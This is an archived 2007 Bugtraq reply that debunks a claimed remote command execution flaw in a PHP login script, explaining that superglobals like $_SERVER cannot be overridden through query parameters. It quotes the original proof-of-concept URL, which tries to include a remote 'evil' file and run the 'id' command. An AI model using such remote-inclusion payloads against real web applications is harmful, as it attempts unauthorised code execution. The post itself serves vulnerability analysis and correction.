lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Tue, 14 Aug 2007 10:16:18 +0200
From: Magnus Holmgren <holmgren@...ator.liu.se>
To: bugtraq@...urityfocus.com
Subject: Re: PHPCentral Login Script Remote Command Execution Vulnerability

On Sunday 12 August 2007 17:12, rizgar@...uxmail.org wrote:
> include.php ;
>
> Lines 4 ;
>
> include("".$_SERVER[DOCUMENT_ROOT]."/$folder/config.php");
>
> PoC :
>
> http://www.example.com/include.php?_SERVER[DOCUMENT_ROOT]=http://evil.txt?&
>cmd=id

*Of course* this does not work. Setting register_globals to "On" causes the 
contents of the "superglobals" ($_SERVER, $_GET, $_COOKIES, etc.) to be 
registered in the global variable namespace. But the superglobals 
*themselves* are special. They shadow everything - you cannot define your own 
$_SERVER array, nor can it be overridden with HTTP GET or POST values. If 
that were possible, using the superglobals would be useless; all scripts 
would be vulnerable unless register_globals is off.

PoC:
echo '$_SERVER[DOCUMENT_ROOT] = ', $_SERVER[DOCUMENT_ROOT], "<br/>";
echo '$_GET["_SERVER"][DOCUMENT_ROOT] = ', $_GET["_SERVER"]
[DOCUMENT_ROOT], "<br/>";

Outputs:
$_SERVER[DOCUMENT_ROOT] = /home/www/docs
$_GET["_SERVER"][DOCUMENT_ROOT] = /foo

If the query string is _SERVER[DOCUMENT_ROOT]=/foo

=========================================================================

Now, register_globals has defaulted to off ever since PHP 4.2.0. I think it 
would be fair to let PHP scripts rely on this, and not consider all scripts 
that don't initialize their variables as vulnerable unless they require 
register_globals to be on (this is not to say that it's not a good idea to 
initialize variables).

And it would of course be nice if people posting to Bugtraq actually tested 
their PoCs first. Can't the moderator spot obvious cases like this, or are 
all vaguely relevant posts accepted, potentially for public ridicule?

-- 
Magnus Holmgren        holmgren@...ator.liu.se

Content of type "application/pgp-signature" skipped

Powered by blists - more mailing lists